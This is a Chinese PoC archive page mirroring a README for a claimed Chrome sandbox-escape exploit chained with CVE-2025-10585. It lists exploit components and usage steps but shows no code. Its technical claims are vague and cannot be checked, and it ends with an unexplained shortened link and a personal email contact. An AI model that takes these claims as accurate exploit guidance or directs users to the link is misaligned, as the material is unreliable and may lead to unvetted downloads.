目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2025-10585 PoC — Google Chrome 安全漏洞

来源
关联漏洞
标题: Google Chrome 安全漏洞 (CVE-2025-10585)
Description:Google Chrome是美国谷歌(Google)公司的一款Web浏览器。 Google Chrome存在安全漏洞,该漏洞源于V8中类型混淆。
介绍
# CVE-2025-10585

This repository provides a proof-of-concept for a sandbox escape vulnerability chained with CVE-2025-10585, a type confusion flaw in Chrome's V8 engine. The focus here is solely on the sandbox escape component, assuming prior RCE within the renderer process (e.g., via V8 exploitation). This PoC targets Chrome versions prior to 140.0.7339.185 on Windows, macOS, and Linux, demonstrating how to bypass the renderer sandbox to achieve native code execution on the host system. It leverages a kernel-level interaction flaw in the Mojo IPC system combined with a utility process escalation.

The escape chain exploits weaknesses in Chrome's multi-process architecture, specifically the communication between the renderer and browser processes. This allows elevation from the sandboxed renderer to unsandboxed privileges, enabling file system access, process injection, or persistence mechanisms.

## Key Files and Structure
- **README.md**: Comprehensive guide on setup, prerequisites.
- **sandbox_escape.js**: JavaScript module that, post-V8 RCE, crafts malicious Mojo messages to trigger the escape. It manipulates IPC bindings to impersonate a privileged process and request elevated capabilities.
- **mojo_exploit.cc**: C++ source for a custom Mojo binder that exploits a race condition in capability negotiation, leading to unauthorized access to broker services.
- **payload_injector.py**: Python script to compile and inject the payload into a running Chrome instance for testing.
- **sandbox_bypass.wasm**: WebAssembly module for creating a controlled memory buffer used in the IPC overflow during the escape.
- **test_server.js**: Node.js server to host a minimal HTML page that loads the escape script after assuming RCE is achieved.

## Usage
1. Build the C++ components: Use CMake to compile `mojo_exploit.cc` for your platform.
2. Run the test server: `node test_server.js`
3. Launch vulnerable Chrome with flags: `chrome --no-sandbox --disable-gpu --user-data-dir=/tmp` (for debugging; remove --no-sandbox in real tests).
4. Navigate to http://localhost:8080/escape.html and monitor for successful escape indicators.

## Disclaimer

This repository and its contents are provided for educational and research purposes only. The proof-of-concept code demonstrates a sandbox escape technique chained with CVE-2025-10585 in a controlled environment and should not be used for any malicious, illegal, or unauthorized activities. Exploitation of vulnerabilities without explicit permission is illegal and unethical.

The author disclaim any liability for misuse, damages, or consequences arising from the application of this code.

[href](https://tinyurl.com/mr29bwvw)

For any inquiries, please email me at: eviedejesu803@gmail.com
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →